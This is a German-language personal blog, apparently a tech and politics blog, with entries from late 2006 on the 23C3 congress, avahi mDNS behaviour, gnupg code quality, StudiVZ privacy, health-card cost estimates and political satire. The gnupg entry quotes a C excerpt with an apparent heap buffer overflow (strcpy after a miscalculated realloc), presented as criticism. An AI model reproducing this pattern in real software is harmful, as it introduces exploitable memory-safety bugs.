Ihr müsst keine Angst haben, nächstes Jahr gibt es aller Voraussicht nach nicht noch mal Comedy, lieber Codequartett. Das ist ja doch sehr unbequem bei einer Comedy, da vor einem fett gefüllten Raum zu stehen. Hinter so einem Tisch sitzend kann man sein Notebook aufklappen und sich da ein bißchen verstecken, aber wenn man da vorne stehen muss, das ist schon noch mal was anderes. Im Übrigen haben die ja das Licht im Saal nicht ausgemacht, d.h. wir konnten euch genau sehen, und alle guckten uns an, und da muss man schon gezielt weggucken, um sich überhaupt auf das Material konzentrieren zu können. Was übrigens lustig ist, wenn ich da jetzt mal drauf achte bei Comedians. Die gucken auch gerne wild in der Gegend herum. Und wir hatten das ja auch noch nie gemacht, und wußten daher nicht, wie viele Lacher man da erwarten soll. Insofern schien mir das auf der Bühne so, als würden wir viel zu wenige Lacher kriegen, aber das Feedback danach war dann doch eher positiv. Ilja war schwer verständlich, haben mir mehrere Leute gesagt, was an einem verrutschten Mikrofon lag. Da war er vor der Veranstaltung mal rangekommen, und dann lag es an der Backe an (da gehört ein bißchen Abstand dazwischen).
Also ich bin ja an sich eher nicht mit zu geringem Selbstbewußtsein geschlagen, aber so eine Comedy, das muss ich nicht nochmal haben.
Oh, und an den Typen, der ins Feedback geschrieben hat, daß er das alles schon mal gehört hat, weil er unsere beiden Blogs liest: Well, DUH!

Sat Dec 30 2006

[l] Zu der Internet-Situation am 1. Tag hat mir jemand aus dem NOC erzählt, daß das ein Problem mit Foundry-Hardware war, die offenbar mit mehr als 4k MAC-Einträgen nicht klar kam, und dann "round robin" Internet gemacht hat. Wir haben das an unserem Tisch im Hackcenter sehr schön sehen können (war eigentlich der Tisch der Ulmer, ich hab mich da nur rangesetzt); da hatten wir immer reihum Internet, das war echt wie Reise nach Jerusalem :-)
Ich finde das ja immer wieder groß, daß solche Lösungen überhaupt verkauft werden. Und das war ja größenordnungemäßig kein kleiner Pimpf-Switch, wie z.B. die Netgear-Geräte, über die sich die ganzen Netzgötter immer so aufregen. Und, hey, soll ich euch mal was zeigen? Die Netgear-Knödel-Switches können 8000 MAC-Adressen ab.
Update: Klarstellung aus dem NOC: das Foundry-Gerät konnte 30000 MAC-Einträge, aber nur 4k NextHops. Als reiner Switch wäre das Teil also prima, oder als reiner Router auch, aber beides zusammen nicht :-)

Fri Dec 29 2006

[l] Tag drei des 23C3 und, was soll ich euch sagen, das Netz funktioniert heute. Sogar Internet! Die Vorträge heute fand ich nicht sooo mitreißend, also werde ich mir heute mal frei nehmen, und mit Frank noch die Folien zum Fnord-Rückblick finalisieren, wenn er mal aus dem Koma erwacht (war wohl gestern eine längere Party noch).
Einen Talk habe ich mir dann doch mal angehört, von Amit Singh über Apple TPM, und wie erwartet (der Mann hat schließlich vorher bei IBM gearbeitet, offenbar sogar in der Nähe des TPM-Projektes) war das ein "das TPM ist ein harmloser kleiner Chip, mit dem man tolle Dinge tun kann, und Apple benutzt das eh gar nicht weiter" Whitewash. Rüdis Talk über TPM war gecancelt worden, und Rüdi hatte Amit offenbar im Vorfeld eine Mail geschickt, aber keine Antwort erhalten, und so fühlte sich Rüdi als Opfer eine großen Tim Pritlove Weltverschwörung und hat dann in der Fragesektion seinem Unmut Luft gemacht. Ich bin vorzeitig rausgegangen, damit ich ein Alibi habe, aber es haben wohl alle körperlich unversehrt überstanden.

Sun Dec 17 2006

[l] Die Briten zeigen uns eine tolle Lösung für das Siemens-Problem auf: "National interest" halts arms corruption inquiry. Siemens baut ja auch Atomreaktoren, insofern könnte man da schon eine ähnliche Argumentation bringen.
Der Brüller ist, daß die Schmiergelder von BAE and Saudis gezahlt wurde, und jetzt sowohl BAE als auch die Botschaft von Saudi-Arabien Druck gemacht haben, daß die Untersuchung mal beerdigt werden soll :-)
Tja, und was haben sie da beschlossen?
Lord Goldsmith consulted the prime minister, the defence secretary, foreign secretary, and the intelligence services, and they decided that "the wider public interest" "outweighed the need to maintain the rule of law".
Aha. So ist das also. Leider sehen sie das an anderer Stelle anders, wenn nur noch 30% der Briten mit Blair zufrieden sind. Da könnte man ja mit einer ähnlichen Argumentation den Standpunkt vertreten, daß man den auf unbestimmte Zeit in Beugehaft nehmen sollte. Das wäre zwar nicht gesetzeskonform, aber offensichtlich in "the wider public interest". (Danke, Hauke)

Fri Dec 15 2006

[l] Ich hatte heute eine Zeugenbefragung beim LKA Berlin. Es ging um die Verdachtskriterien islamistischer Terrorismus.
Stellt sich raus, daß ein Herr Günther Freiherr von Gravenreuth die Anzeige gestellt hat, weil er die Heise-Geschichte dazu gesehen hat. Das hat dann seinen geordneten Dienstgang durch die Behörden gemacht, und ist jetzt beim LKA Berlin angekommen. Leider hat das BKA versäumt, der Akte einen Vermerk beizulegen, ob die Verdachtskriterien jetzt echt sind oder nicht, und so konnte mir das auch der LKA-Beamte nicht sagen; ich weiß es immer noch nicht. Auch hat mich niemand aufgefordert, das aus dem Netz zu nehmen, daher lasse ich es dort.
Weitere Details gibt es nicht. Das LKA bat mich, da es sich um eine laufende Ermittlung handelt, neben obigen Dingen nichts weiter auszuplaudern.
Update: Das ist offenbar von einigen mißverstanden worden: Gravenreuth hat nicht mich angezeigt, sondern den Vorgang. Ich war da als Zeuge, nicht als Angeklagter. Soweit ich weiß, hat er nichts gegen mich, und ich muss mich auch nicht bedroht fühlen.

Thu Dec 14 2006

[l] Wegen der Kinderpornografie brauchen wir mehr Polizei. Oder?
Stuttgarter Polizeikommissar mit Kinderpornos auf dem Privat-PC erwischt. Da war im März. Anklage wurde im August erhoben. Wir haben davon nichts gehört, weil…
Dass der Fall nicht öffentlich gemacht wurde, begründete die Behördensprecherin unter anderem mit dem Schutz von Persönlichkeitsrechten und der Flut von Verfahren wegen des Besitzes von kinderpornografischen Schriften. Allein die Staatsanwaltschaft Stuttgart bearbeite jährlich rund 800 Fälle.
Und das macht mich ja nun doch nachdenklich. Alleine Stuttgart hat pro Jahr 800 Fälle? Die gesamte Bevölkerung ist sich einig, daß man wegen Kinderpornografie alle noch so fiesen Abhörmaßnahmen begründen kann, und dann haben wir so viel davon?
Schlimmer noch: unsere Justiz wird mit frivolen Raubkopier-Klagen geflutet, während diese Sachen wegen Überlastung über Monate liegen bleiben.

Tue Dec 12 2006

[l] Plusminus hat heute einen wunderbaren Bericht über das Finanzamt. Es geht darum, daß viele Leute den Fehler gemacht haben, Anlageverluste im Dot-Com-Bust nicht dem Finanzamt zu melden. Man kann mit sowas aber spätere Gewinne kleiner rechnen, und jetzt hat der Bundesfinanzhof geurteilt, daß die Finanzämter die Leute auch nachträglich ihre Verluste melden und anrechnen lassen müssen. Es gab da sechs Urteile zu, alle in diese Richtung, aber das Finanzministerium hat einfach bisher das Urteil nicht in dem entsprechenden Finanzanzeiger veröffentlicht, und erst dann dürfen die Finanzämter das auch anwenden. Besser noch: jetzt basteln sie gerade ein neues Gesetz, um die Urteile rückwirkend auszuhebeln.

Mon Dec 11 2006

[l] Wie ihr vermutlich auch alle sehe ich gerade mit Verwunderung dem Polonium-Winterloch zu. Nicht weil das so ein Pressezirkus gibt, sondern weil … Polonium 210 ein Alphastrahler ist, und Alphastrahlung kann man schon mit einem Blatt Papier abschirmen. Das geht also schon mal gar nicht durch die menschliche Haut durch. Wenn man es an den Händen hat — Händewaschen, weg ist es. Nun könnte man mit Schweiß argumentieren, aber … die haben ja Kleidung an, und das müsste erst mal aus dem Magen in den Schweiß kommen, und das ist hinreichend Quantität, daß man das da am Ende messen kann. Kurz gesagt: das stinkt doch mal wieder hinten und vorne.
Während ich so darüber nachdachte, wies mich fh auf diese Spiegel-Story hin, die sich … genau die selben Gedanken gemacht hat und zu diesem Schluß kommt:
Dann müssten die Hintermänner der Tat geradezu bewusst schlampig mit dem Stoff umgegangen sein. Die Gründe dafür sind fraglich. "Wenn ich in der Lage bin, mir Polonium zu verschaffen und das zu tun, was hier offenbar getan worden ist, dann sollte ich eigentlich auch soviel über den Umgang damit wissen, dass ich keine Spuren hinterlasse", sagt Urban. "Zumindest wenn ich das nicht will."
Also ohne mir jetzt hier anmaßen zu wollen, daß ich mit meiner Paranoia-Verschwörungsscheiße den Spiegel infiziert habe: *strike*!!! :-)

Sun Dec 10 2006

[l] Hatte ich zu erwähnen vergessen die Tage: avahi (ein populärer mdns-Daemon für Linux) schickt ungültige DNS-Antworten raus. Im DNS-Standard steht, daß in DNS-Antwortpaketen das Recursion Bit genau wie bei der Frage gesetzt sein muss; wenn man avahi eine DNS Query mit Recursion Bit schickt, kommt die Antwort ohne Recursion Bit.
Was mich daran am meisten schockiert: das hat keiner gemerkt. Niemand. Avahi gibt es nen Jahr? Länger? Und niemand außer mir hat offenbar mal unabhängig mdns implementiert. Der Effekt ist, daß wenn man mit dem dietlibc Resolver nach einem von avahi beantworteten Host fragt, die Antwort gefressen wird. Ich habe mal einen Workaround in die dietlibc eingebaut, aber hey, ist das zum Kotzen oder was?
Update: Jemand hat dem avahi-Autor Bescheid gesagt, und der hat mich jetzt per Email angepinkelt. Die Situation stellt sich tatsächlich etwas differenzierter dar als bisher dargestellt. avahi implementiert die aktuelle Spec, ich eine ältere. Meine Schuld, hätte ich vor dem Meckern mal gucken können. In der aktuellen Spec steht, daß das RD Bit Null sein soll beim Senden, und daß man es beim Reinkommen ignorieren muss. Das stand früher nicht in der Spec, aber man muss die Wayback Machine bemühen, um auf frühere Versionen zugreifen zu können; offenbar sind den zeroconf-Leuten die früheren Versionen peinlich. Anyway, ich habe mir avahi bei der Gelegenheit noch mal kurz angesehen, und muss sagen, ist nicht so schlimm wie gnupg, aber leider auch nicht so richtig toll. Ich hab da jetzt keinen kompletten Audit gemacht, aber schon mal direkt nen (nicht exploitbaren) off-by-one buffer overflow gefunden, und eine Endlosschleife in der DNS Dekompression. Ich denke mal, für avahi wird es demnächst ein Update geben. Der CVS-Code bei der dietlibc akzeptiert jetzt konform zur aktuellen Spec auch mDNS-Pakete, die das Bit anders setzen als es bei ihnen ankam. Ich möchte an dieser Stelle übrigens die mDNS-Specschreiber aufrufen, diesen Blödsinn zu lassen, und die Regeln von DNS bezüglich dieser Bits weiter bestehen zu lassen — Eingabe == Ausgabe. Dann kann man mehr Code wieder verwenden und ihr ganzes Gefasel von wegen Code-Wiederverwerten und Protokoll-Beibehalten stimmt dann auch tatsächlich. Eines ihrer Argumente ist ja gerade, daß man die APIs beibehalten kann, und daraus folgt, daß res_query das Paket nicht selber baut, sondern res_mkquery tut das, und daher ist es auch nicht kosher, wenn res_query dann im Paket rumdoktorn soll, um das RD Bit zu löschen (immerhin sagt die mDNS-Spec dafür nur SHOULD, daher spare ich mir das). Leider sagt die aktuelle mDNS-Spec auch, daß bei rausgehenden Antworten das RD-Bit Null sein soll, und die DNS-Spec sagt, daß bei Antworten dieses Bit übernommen werden soll. Wenn die das Gefasel mit API-Beibehalten also ernst nehmen, dann sollte hier ganz klar Eingabe == Ausgabe gelten.
[l] OK, jetzt bin ich offiziell schockiert. Ich habe mal Firefox mit dem Malloc-Wrapper laufen lassen, habe digg.com geladen, und dann auf zwei Links geklickt, bevor ich Firefox wieder zugemacht habe. Das ganze dauerte Sekunden, und das Log war fast 150 MB groß. Darin waren jeweils rund 1 Mio malloc und calloc und je rund 2 Mio realloc und free. Das ist ja barbarisch, wie ineffizient heutzutage programmiert wird! Haben die Leute denn gar keine Scham?! Unglaublich.

Sat Dec 9 2006

[l] Der Secret Service hat sein Office in Nigeria zugemacht. Jetzt bleibt nur noch das Problem, die Millionen außer Landes zu bringen, die die da noch rumzuliegen hatten!1!! :-)

Thu Dec 7 2006

[l] Gentoo stinkt. Ich habe mir die Tage mal eine LiveCD von SabayonLinux gezogen, und ich finde ja Gentoos Bootzeit schon absolut unakzeptabel, aber diese LiveCD… also erst mal stellte sich raus, daß das eine LiveDVD ist, über 3 GB. Und da waren dann irgendwelche Demos für irgendwelche Spiele drauf. Ich hatte mir das gezogen, weil sie sagten, damit könne man sich mal 3d X mit Wobble-Effekten und so angucken, Beryl, verbrennende Menüeffekte, und das käme mit Support für nvidia und ati und intel embedded. Nun, der nvidia-Treiber ist kaputt, weil sie das Modul nicht mitkopiert haben, die Knalltüten. Aber das merkt man erst, nachdem man geschlagene 10 Minuten zuguckt, wie dieses System vor sich hin bootet. Unfaßbar. Also so was langsames, da ist ja Vista schneller! Nee, Leute, so wird das nichts. Debian ist zwar in allen anderen Punkten scheiße, aber immerhin bootet es halbwegs flott. So kann man keinen Blumentopf gewinnen. Ich würde ja nur Amok laufen, wenn mein Notebook so lange booten würde. Ich habe da minit drauf und der bootet in unter 20 Sekunden inklusive BIOS, grub und Kernel. Die Leute heulen immer rum, daß ihr Suspend nicht geht (was im Übrigen an kaputten BIOSsen liegt) — ich habe noch nie Suspend benutzt. Noch nie. Brauche ich nicht. Ich boote schneller als ihr aus dem Suspend aufwacht. Und so werden wir wohl auch in Zukunft in der Computerbranche selbstgemachte Probleme lösen.
[l] Auch ne Methode: zweiter fetter Exploit in gnupg in einer Woche, und was sagt der Autor dazu? Ich paraphrasiere mal: Unser Code ist für die Tonne und muss einmal komplett gereviewed werden; gebt uns Geld, dann machen wir das.
Also ich mache sowas ja beruflich, und habe mir mal überlegt, ob ich nicht gnupg auditieren will. Aber das Ding ist ja so derartig am Explodieren von Release zu Release, das ist völlig unakzeptabel. gnupg ist einmal komplett Teil der TCB, solchen Code muss man minimieren. Was macht Herr Koch stattdessen? Baut da Grafik-Anzeigen rein, einen Agent, eine nicht abschaltbare Smartcard-Library, das (binäre!) Dateiformat ist zum Göbeln, der Footprint bei gnupg 2 beinhaltet auch noch libusb (WTF!?), pth (pthread-Abstraktion von GNU), hat LDAP drin (!?!?), … hier ist mal ein Codezeilen-Vergleich:
1. gnupg 1.0: 76891 Zeilen
2. gnupg 1.4.5: 149364 Zeilen
3. gnupg 2.0.1: 175070+1933 (libgpg_error)+6723 (libassuan)+27164 (libksba)+11180 (pth) = 222070 Zeilen
Merkt jemand einen Trend? Zum Vergleich, die komplette dietlibc hat rund 80000 Codezeilen. Nein, gnupg muss aus meiner Sicht einmal komplett entsorgt und neu gemacht werden. Ich gebe hier mal ein Beispiel, aus gnupg 2.0.1, keyserver/gpgkeys_hkp.c:
```
  while(fgets(line,MAX_LINE,input))
[…]
        if(strlen(line)+keylen>keymax)
          {
            keymax+=200;
            tmp=realloc(key,keymax+1);
[…]
            key=tmp;
          }
        strcpy(&key[keylen],line);
        keylen+=strlen(line);
```
Irgendwie schon schade, daß es dieses Jahr kein Codequartett auf dem Congress gibt. MAX_LINE ist so definiert:
```
#define MAX_LINE       (6+1+1024+1)
```
und keylen und keymax starten als 0. WTF?!

Fri Dec 1 2006

[l] Das Dr. Joseph Schäuble Institut für politische Kommunikation teilt mit:
dass mit den beiden heftig umstrittenen Vorhaben "in einer Zeit großer Bedrohungen und Gefahren das Menschenmögliche an Sicherheit" gemacht werde. Die neuen, weitgehenden Regelungen stünden im Einklang mit der Verfassung und bewegen sich auf rechtsstaatlichem Boden. […]
Schäuble betonte bei der lebhaften 2. und 3. Lesung der Gesetzesentwürfe, dass "der Staat die Aufgabe hat, seine Bürger zu schützen" und dies mit besseren Möglichkeiten zur Prävention mache. Dies sei "konstitutiv für das Abendland". Der freiheitliche Rechtsstaat müsse in der Lage sein, seinen Bürgern Sicherheit zu gewährleisten, "sonst würde am Ende die Freiheit gefährdet".
Mir fällt da spontan "Why we fight" ein, da haben sie am Anfang ein großartiges Segment, wo sie ein Dutzend Kinder einzeln gefragt haben, wieso wir eigentlich kämpfen. "For freedom". Genau. Ich möchte außerdem darauf hinweisen, daß auch Hitlers Ermächtigungsgesetz verfassungskonform und legal war damals, und der hatte einen weniger weiten Fokus als das "Abendland".

Tue Nov 28 2006

[l] Und noch ein untotes IT-Monsterprojekt zuckt noch: Herkules, das Sieben-Milliarden-Projekt der Bundeswehr. Da sollen 140.000 IT-Arbeitsplätze neu ausgestattet werden, 300.000 Festnetztelefone und 15.000 Mobiltelefone angeschafft werden. Das ist ja schon ein dicker Hund, wie viele Leute bei der Bundeswehr arbeiten. 300.000 Festnetztelefone? Whoa. Aber hey, das bleibt ja alles in der Hand der Regierung, nicht wahr? Es handelt sich schließlich um die Streitkräfte, da macht man keine Experimente…?
Der Vertrag wird ein Auftragsvolumen von rund sieben Milliarden Euro haben und soll über zehn Jahre laufen. Er sieht vor, dass eine eigenständige Gesellschaft die Informationstechnik- und Telekommunikationsinfrastruktur der Bundeswehr übernehmen und modernisieren wird. Die öffentliche Hand soll mit 49,9 Prozent an der Gesellschaft beteiligt sein. SBS wird 50,05 Prozent und IBM 0,05 Prozent übernehmen.
Nur, damit das jeder mitkriegt. Die geben die IT unserer Streitkräfte an eine profitorientierte Firma ab. Die IT. Unserer Streitkräfte. An eine profitorientierte Firma. Hallo? Haben die einen Schaden? Und die Geheimdienste der Bundeswehr machen sie bei der Gelegenheit auch gleich zu, oder wie? Nein, besser, die werden dem BND eingegliedert. Das ist schlimmer als der Tot, das ist Untot :-)
Aber halt, es kommt noch härter. Was passiert normalerweise, wenn man eine Aufgabe privatisiert, die man vorher selber gemacht hat? Richtig, es wird gleich deutlich teurer.
Nach einem Bericht von ddp hat der Bundesrechnungshof kritisiert, dass "Herkules" unter Leitung des Bundesverteidigungsministeriums um rund eine Milliarde Euro billiger geworden wäre.
Also mal völlig abgesehen von der Tatsache, daß die da überhaupt die IT unserer Streitkräfte outsourcen, und damit ausländischen Spionen Tür und Tor öffnen… sie geben bei der Gesellschaft auch noch die Mehrheit aus der Hand, und wundern sich dann, als sie prompt abgezockt werden. Unglaublich.
Aber nicht unglaublich genug, daß man da nicht noch ein bißchen Zynismus anbringen könnte. Andreas hat die Vermutung, daß sie die Bundeswehr komplett zumachen wollen, und das versicherungstechnisch günstiger ist, die in Afghanistan erschießen zu lassen, als sie hier zu entlassen. Je mehr ich darüber nachdenke, desto mehr muss ich dem zustimmen.
Oh, noch was. Wieso heißt das eigentlich Herkules, wird sich der eine oder andere fragen. Meine Theorie: weil sie einen echten Spindoktor-Helden brauchten, um die Notwendigkeit des Projekts zu begründen.

Fri Nov 24 2006

[l] Hat wahrscheinlich eh schon jeder gesehen, aber falls nicht: StudiVZ und die 700 Stalker. StudiVZ, die neue Firma der Samwer-Brüder, denen wir schon Jamba zu verdanken haben, hat von Facebook nicht nur Idee und Layout übernommen, sondern offenbar auch den Code oder zumindest die Datenschutzprobleme. So kann man private Fotos der Leute von außen ohne Paßwort einsehen, und in StudiVZ hat sich eine Gruppe von 700 Stalkern gegründet, die sich dann den Frauenbildern hinterher sabbernd zum Real-Life Stalking verabredet haben.
Auf das Problem angesprochen haben StudiVZ-Mitarbeiter die Gruppe nicht zugemacht, sondern offenbar sogar nachgefragt, ob sie mitmachen dürfen.
Also mal ganz ehrlich: Das sind die Leute, die kleinen Kindern das Geld aus der Tasche ziehen. Das sind Leute, die mit ihrer Klingeltonwerbung psychische Schäden bei breiten Teilen der Bevölkerung anrichten. Was habt ihr denn gedacht, daß denen plötzlich ein Gewissen wächst? Daß die neue Firma dann plötzlich moralisch-ethische Grundsätze hat? Ist doch klar, daß das in deren Interesse ist! Sex Sells. Insofern kann ich ja gar kein Mitleid mit Leuten entwickeln, die ihre privaten Fotos bei irgendwelchen Webseiten hochladen. Das ist in meinen Augen der Hauptvorteil von Digicams, daß man seine Fotos nicht mehr irgendwelchen Leuten beim Fotodienst zeigen muss. Insofern ist auch mein Credo seit Jahren, daß man Daten, von denen man nicht will, daß sie öffentlich werden, gar nicht erst anfallen läßt. Am besten sieht man das bei Promi-Sex-Tapes. Sowas leakt immer eines Tages. Gar nicht erst machen, und gut ist.
[l] Lukaschenko gibt Wahlfälschung zu. Mit diesen beiden Hammerzitaten:
Er habe die Zahl der Menschen, die für ihn gestimmt hätten, nach unten korrigieren lassen - um die Abstimmung damit gefälliger für den Westen zu machen, sagte Lukaschenko am Donnerstag. "In Wirklichkeit haben 93 Prozent für mich gestimmt, aber wir haben für Europa 86 Prozent daraus gemacht."
und
Die Europäische Union habe ihm vor der Wahl erklärt, wenn das Ergebnis nahe an europäischen Standards sei, würde sie es womöglich anerkennen, so Lukaschenko weiter.
WTF?! Wenn das Ergebnis vertrauenswürdig aussieht, nehmen wir es?! Scheiß auf Wahlbeobachter, das muss bloß plausibel aussehen!? Oh Mann. (Danke, Oliver)
[l] Sogar die Mainstreampresse findet den "Terroranschlag" am Frankfurter Flughafen lächerlich aufgebauscht und hat noch das neue Detail, daß der Fall längst bei den Akten lag. Nicht nur das, die haben die Hausdurchsuchung nur gemacht, um etwas in der Hand zu haben, um die Telefonüberwachung verlängert zu kriegen.
[l] Wie ihr vielleicht gesehen habt, hat der CCC eine Kosten-Nutzen-Analyse zur Gesundheitskarte befreit. Ich habe das Dokument mal grob gesichtet, und dabei sind mir folgende Punkte aufgefallen:
1. [Seite 68] Die Kosten für die Ausgabe der Karten wird zwar ermittelt, fließt aber nicht in die Kosten-Nutzen-Analyse ein, weil das "nicht KNA-relevant im Sinne des Workshop 1" sei.
2. [Seite 86] Ein zweites Rechenzentrum für Ausfallsicherheit ist nicht vorgesehen. "Da solche Disaster-Recovery-Architekturen die Gesamtkosten eines solchen Dienstes oft verdoppeln und die verpflichtenden Anwendungen auch offline allein auf Basis der eGK funktionsfähig sind, wird von einer Berücksichtigung von Disaster Recovery für die KNA abgesehen." Aufmerksame Beobachter werden sicher gemerkt haben, daß das weniger Redundanz als bei den Österreichern ist, und schon denen ist ihr System mehrfach um die Ohren geflogen
3. [Seite 87] Für die Application Server gibt es N+1 Redundanz, d.h. ein Server mehr als man braucht. Wenn zwei ausfallen, hat man dann halt ein Problem.
4. Die Zahlen kommen auf gruselige Art und Weise zusammen; so sind für die meisten Dienste nicht nur die Software noch nicht fertig, es gibt noch nicht einmal eine Spec, was der Dienst genau tun soll. Und so zieht sich der Gutachter die Zahlen dann eben aus dem Ar^Hllerwertesten, z.B. daß Threads jeweils 200 KB RAM brauchen, und zwar offenbar unabhängig von der Anwendung, um die es gerade geht. Laut Fußnote ist das eine "Expertenschätzung Booz Allen Hamilton". Dann schätzt die Studie auf ähnlicher Grundlage den RAM-Bedarf der Rechner, indem die Anfragen (pro Sekunde?) genommen werden, und man das mit den 200 KB multipliziert. Glücklicherweise ist dann da ein Rechenfehler drin, so daß sie doppelt so viel RAM verplanen wie sie brauchen, ansonsten wäre das echt problematisch geworden.
5. Ein weiteres Beispiel dafür, daß die Zahlen keinerlei Realitätsbezug haben, ergibt sich beim Storage-Sizing des eVerordnungs-Dienstes. Hier nimmt die Studie einfach an, daß die Datensätze nach einem Jahr gelöscht werden.
6. Überhaupt scheint da jemand nicht rechnen zu können. Bei den Lastberechnungen (Seite 89) liefert eine Schätzung der gematik (die durchführende Firma) für Peak-Last bei einer Epidemie die Zahlen. Die Zahlen gehen von 2160 Verordnungen pro Stunde pro Apotheke aus, bei 22.000 Apotheken, und dazu 80 Verordnungen pro Praxis, bei 103.000 Praxen. Die Zahlen scheinen mir eine grobe Schätzung zu sein, wie viel Verordnungen die jeweilige Infrastruktur maximal ausstoßen kann, zumindest bei den Apotheken, denn 2160 Verordnungen pro Stunde bei den Apotheken, das sind unter zwei Sekunden pro Verordnung. Das ist auch ungefähr die Zeit, die alleine der Chipkartenleser brauchen wird. Booz Allen Hamilton zählt das zusammen und kommt auf 28.000 Verordnungen pro Sekunde (bei meinem Taschenrechner sind es 15.500), und kommt dann mit folgendem Kracher: "Aus gutachterlicher Sicht ist dieser Wert substantiell zu hoch.".
  Dann nimmt das Gutachten diesen Wert, um die Anzahl der benötigten Server zu berechnen, indem sie TPC-Werte nehmen und die Verordnungen durch die TPC-Werte teilen. Sie haben als typische TPC-Werte 100-200 Transaktionen pro Sekunde bestimmt, diese Werte kommen wohl von IBM und Sun, also geben sie als Ergebnis an, daß man dann ja 70-140 Server bräuchte. Mhh. Also wenn ich ihre 28.000 Verordnungen nehme, komme ich auf 140-280 Server, und wenn ich meine 15.500 Verordnungen nehme, komme ich auf 78-155 Server.
  Wieso erwähne ich das mit den TPC-Werten? Das sind Hardware-Benchmarks, die Hersteller benutzen (wie ehemals die MIPS-Angaben bei CPUs), um ihre Hardware gut aussehen zu lassen. Die TPC-Werte haben mit real erreichbaren Transaktionen so gut wie nichts zu tun. Da hat der Hersteller unter Laborbedingungen tiefergelegt mit Spezial-Builds, besonders viel Cache, handgetunetem OS usw. versucht, maximale Marketing-Zahlen zu erreichen. Das für ein reales Server-Sizing zu nehmen ist hanebüchen.
7. Besonders skurril ist eine Frage bei dem Fragebogen im Anhang:
  Ist geplant, über die Pflicht- und freiwilligen Anwendungen hinaus noch weitere Anwendung über die eGK zu realisieren (z.B. Bonusprogramme, usw.)?"
8. Es fällt auf, daß alle Schätzwerte (wie viele Anrufe sie in ihrem Callcenter erwarten, …) einen margin of error haben — nicht aber die Entwicklungskosten für ihre Spezialanwendungen. Da nimmt die Studie in einem Fall z.B. einfach mal 25 Personenjahre Aufwand an, ohne daß auch nur eine Spec vorliegt für diesen Dienst, und so viel sind es dann halt für die Kalkulation. Das Risiko, daß die Entwicklung nicht fertig wird, ist überhaupt nicht erfaßt. Wieso erwähnen die diese ganzen Dienste, wo es gar keine Spec für gibt? Weil in dem Nutzenmodell die Nutzen hauptsächlich durch diese optionalen, freiwilligen Dienste reinkommen (z.B. die Notfalldaten, wo dann auf der Karte gespeichert ist, ob man gegen Tetanus geimpft ist, und gegen welche Medikamente man allergisch oder resistent ist). Also mußten sie diese Dienste berücksichtigen, sonst wäre das von vorneherein ein Totalreinfall gewesen. Das Risiko, daß sie die Hardware für einen Dienst gekauft und hingestellt haben, aber die Software noch nicht fertig ist, und sie dann für die Wartung zahlen, ist auch nicht erwähnt. Wieso haue ich darauf so herum? Weil der neue CEO von gematik der Ex-CEO von der fiscus GmbH ist, dem bei seinem anderen Großprojekt (neue Software für die Finanzämter) genau das passiert ist.
9. In dem Papier ist von einem MPLS-Backbone die Rede. Da stellt sich ja mir die Frage, ob die das als VPN betrachten, und die Sachen über die Leitung nicht verschlüsseln. Für Verschlüsselung der Daten auf der Leitung habe ich keinerlei Hinweis gefunden, und wenn man bei der Telekom ein VPN kauft, kriegt man gerne mal ein MPLS-Konstrukt verkauft, denn MPLS sorgt ja dafür, daß das nur über Telekom-Leitungen geroutet wird, die sind ja per Definition sicher, also braucht man da nichts zu verschlüsseln. Das mag ja für leichtgläubige Chefs von New Economy Klitschen zutreffen, aber für unsere Gesundheitsdaten brauchen wir schon richtige Absicherung.
10. An einer Stelle haben sie keine Peak-Zahlen zur Hand, also schätzen sie die, indem sie die durchschnittliche Auslastung mal vier nehmen. Das fand ich besonders putzig, weil der Durchschnitt ja nicht der Tagesdurchschnitt ist, sondern auch die Nachtphase beinhaltet.
Kurz gesagt: das Papier liest sich wie ein einziges Desaster. Sie haben da mit teilweise deutlich unseriösen Methoden an den Zahlen geschraubt, und selbst mit derartigen Methoden kommen sie nur gerade so auf einen Break Even. Und ihr habt ja gesehen, wie sie die Kosten hier kleinzurechnen versucht haben, und trotzdem ist das schon das dreifache dessen, was sie dem Gesundheitsministerium initial versprochen hatten. Wenn dieses Papier das Projekt nicht kippt, dann weiß ich auch nicht.
Update: Eine Sache ist noch auffällig: bei mehreren Punkten ignorieren sie Kosten mit dem Hinweis, daß das ja bei den Kosten für die Karten schon drin sei — diese Kosten werden aber anscheinend den Bürgern aufgedrückt, und zählen deshalb nicht als Projektkosten. Noch was: der Krypto-Punkt bezieht sich auf das MPLS. Da ist VPN-Hardware mit IPsec im Einsatz, allerdings nur von dem Arzt zum Backbone, und der läuft per MPLS und hat ~50 Endpunkte, daher denke ich nicht, daß das bloß das LAN im Rechenzentrum sein soll.

Tue Nov 21 2006

[l] Die aktuelle "für wie blöd halten die uns eigentlich" Meldung: Terroristische Flugzeugsprengung verhindert!1!! Der Knüller: die "Terroristen" waren a) natürlich Araber, b) das Ziel war eine El-Al Maschine (die sind ultra-paranoid, die hätten eine Kofferbombe mit Sicherheit gefunden) und c) die Leute sind alle wieder auf freiem Fuß, weil die Tat in einem "sehr frühen Planungsstadium war". Yeah, right. Besser noch: das war kein grandioses Verkacken von geradezu galaktischen Ausmaßen, sondern das haben wir absichtlich so gemacht!1!!
Beteiligte Ermittler warnten nach der Veröffentlichung erster Details der Ermittlung am Vormittag vor Panik. "Wir haben nicht in letzter Minute vor einem Anschlag zugeschlagen, sondern ganz bewusst sehr früh", sagte ein hoher Beamter SPIEGEL ONLINE. Demnach seien die möglichen Planungen der Gruppe im Anfangsstadium gewesen.
Ich weiß nicht, wie das euch geht, aber für mich liest sich das so, als sei nicht mal klar gewesen, daß die da was planen. Oder wieso sprechen die da von "möglichen Planungen"? Unglaublich.

Thu Nov 16 2006

[l] IT-Großprojekte sind ja schon immer ein dankbares Feld für mein Blog gewesen, weil die eigentlich immer vollständig verkackt werden, und am Ende blutet der Steuerzahler dafür. Im Kurzzeitgedächtnis sind da insbesondere Tollcollect (Maut), Herkules (Bundeswehr) und Fiscus (Finanzamt), und der Geschäftsführer von Fiscus ist jetzt Geschäftsführer von der gematik, die die Gesundheitskarte durchführt.
Offensichtlich ist der Herr Bonerz hochqualifiziert für die Durchführung von IT-Großprojekten, unter seiner Führung hat ja offenbar schon Fiscus Millionenprofite gemacht. Für die Firma, selbstverständlich, nicht für den Steuerzahler. Und darum geht es ja bei Projekten.

Wed Nov 15 2006

[l] Einige Fundi-Christen haben sich zum Motto gemacht, so viele Kinder wie biologisch möglich in die Welt zu setzen. Das ist dann die Armee Gottes, und die Idee geht (natürlich) auf einen Psalm zurück. Sehr gruselig, das.

Fri Nov 10 2006

[l] Na ganz großartig, das ist also das neue Versionsmanagementsystem, das so großartig ist, daß sie jetzt den Linux-Kernel damit verwalten?
```
